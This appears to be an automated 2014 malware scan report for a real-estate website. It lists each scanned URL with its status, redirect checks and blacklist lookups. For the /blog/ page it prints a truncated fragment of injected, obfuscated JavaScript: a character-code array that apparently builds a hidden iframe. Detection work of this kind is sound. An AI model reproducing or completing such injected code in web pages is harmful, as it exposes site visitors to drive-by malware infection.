Scanned pages/files
Request | Server response | Status |
http://dpsrealestate.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:27 GMT Location: http://www.dpsrealestate.com/ Server: nginx/1.4.7 Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/ | 200 OK Content-Length: 7677 Content-Type: text/html | clean |
http://www.dpsrealestate.com/jscript/copyright.js | 200 OK Content-Length: 652 Content-Type: application/javascript | clean |
http://dpsrealestate.com/jscript/getcontent.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:28 GMT Location: http://www.dpsrealestate.com/jscript/getcontent.js Server: nginx/1.4.7 Content-Length: 325 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/jscript/getcontent.js | 200 OK Content-Length: 1121 Content-Type: application/javascript | clean |
http://dpsrealestate.com/blog/ | 200 OK Content-Length: 63254 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function mado(){fcf=function(){--(hja.body)}()}egurf=\"fr\"+\"om\"+\"Ch\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)qeblrc=4;lnbnab=(\"41,87,96,8f,84,95,8a,90,8f,41,99,87,84,83,51,5a,49,4a,41,9c,2e,2b,41,97,82,93,41,94,95,82,95,8a,84,5e,48,82,8b,82,99,48,5c,2e,2b,41,97,82,93,41,84,90,8f,95,93,90,8d,8d,86,93,5e,48,8a,8f,85,86,99,4f,91,89,91,48,5c,2e,2b,41,97,82,93,41,99,87,84,83,41,5e,41,85,90,84,96,8e,86,8f,95,4f,84,93,86,82,95,86,66,8d,86,8e,86,8f,95,49,48,8a,87,93,82,8e,86,48,4a,5c,2e,2b, Antivirus reports:
| ||
http://dpsrealestate.com/jscript/copyright.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:29 GMT Location: http://www.dpsrealestate.com/jscript/copyright.js Server: nginx/1.4.7 Content-Length: 324 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://www.dpsrealestate.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://dpsrealestate.com/scroller/jquery.easing.1.3.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:32 GMT Location: http://www.dpsrealestate.com/scroller/jquery.easing.1.3.js Server: nginx/1.4.7 Content-Length: 333 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/scroller/jquery.easing.1.3.js | 200 OK Content-Length: 8100 Content-Type: application/javascript | clean |
http://dpsrealestate.com/scroller/jquery.mousewheel.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:33 GMT Location: http://www.dpsrealestate.com/scroller/jquery.mousewheel.min.js Server: nginx/1.4.7 Content-Length: 337 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/scroller/jquery.mousewheel.min.js | 200 OK Content-Length: 1175 Content-Type: application/javascript | clean |
http://dpsrealestate.com/scroller/jquery.mCustomScrollbar.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 15 Apr 2014 04:46:33 GMT Location: http://www.dpsrealestate.com/scroller/jquery.mCustomScrollbar.js Server: nginx/1.4.7 Content-Length: 339 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.dpsrealestate.com/scroller/jquery.mcustomscrollbar.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://www.dpsrealestate.com/scroller/ | 200 OK Content-Length: 1838 Content-Type: text/html | clean |
http://www.dpsrealestate.com/scroller/_i.php | 200 OK Content-Length: 21 Content-Type: text/html | clean |
http://www.dpsrealestate.com/scroller/dynamic_content.html | 200 OK Content-Length: 1238 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dpsrealestate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 15 Apr 2014 04:46:27 GMT
Location: http://www.dpsrealestate.com/
Server: nginx/1.4.7
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
GET / HTTP/1.1
Host: dpsrealestate.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 15 Apr 2014 04:46:27 GMT
Location: http://www.dpsrealestate.com/
Server: nginx/1.4.7
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
...304 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dpsrealestate.com
Referer: http://www.google.com/search?q=dpsrealestate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dpsrealestate.com
Referer: http://www.google.com/search?q=dpsrealestate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dpsrealestate.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dpsrealestate.com/
Result: dpsrealestate.com is not infected or malware details are not published yet.
Result: dpsrealestate.com is not infected or malware details are not published yet.